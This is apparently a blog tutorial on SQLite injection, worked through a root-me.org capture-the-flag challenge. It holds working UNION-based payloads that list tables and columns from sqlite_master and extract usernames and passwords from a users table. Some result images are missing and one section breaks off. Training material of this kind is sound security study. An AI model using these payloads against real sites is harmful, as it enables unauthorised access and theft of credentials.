i sqlite injection – All things in moderation

sqlite injection

Introduction

SQLite is a small RDBMS, written in C. SQLite is an embedded SQL database engine. Unlike most other SQL databases, SQLite does not have a separate server process. SQLite reads and writes directly to ordinary disk files.

Cheat Sheet

name syntax
Comments
IF Statements CASE
Substring substr(x,y,z)
Length length(stuff)
Enumerate tables SELECT tbl_name FROM sqlite_master;
Enumerate columns SELECT sql FROM sqlite_master

Example consider url

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=12
This is a root-me.org’ challenge (SQL injection – numeric)

Lets check for sql injection vulnerability

The easiest way to discover SQLite injection vuln is: add to the end of URL some characters like ‘ (quote), ” (double quote) . If the server show some error like in picture folowing. That mean web app have sql injection vunl.

Exploit sql injection:

Get information schema:

Because all the dot commads are available at SQLite prompt only, so while doing your programming with SQLite, you will use the following statement to list down all the tables created in your database using the following SELECT statement with sqlite_master table:

1.Enumerate table

sqlite query:

sqlite> SELECT tbl_name FROM sqlite_master;

payload:

news_id=12 union select 1,2, tbl_name FROM sqlite_master; -- -

This will produce the following result:

Blind SQL injection

like other DBMS such as MySQL, SQLite

2.Enumerate columns

sqlite query:

sqlite> SELECT sql FROM sqlite_master ;

payload:

news_id=12 union select 1,2, sql FROM sqlite_master; -- -

This will produce the following result:

Get Data

payload

news_id=12 union select 1,username, password FROM users; -- -

This will produce the following result:

Leave a Reply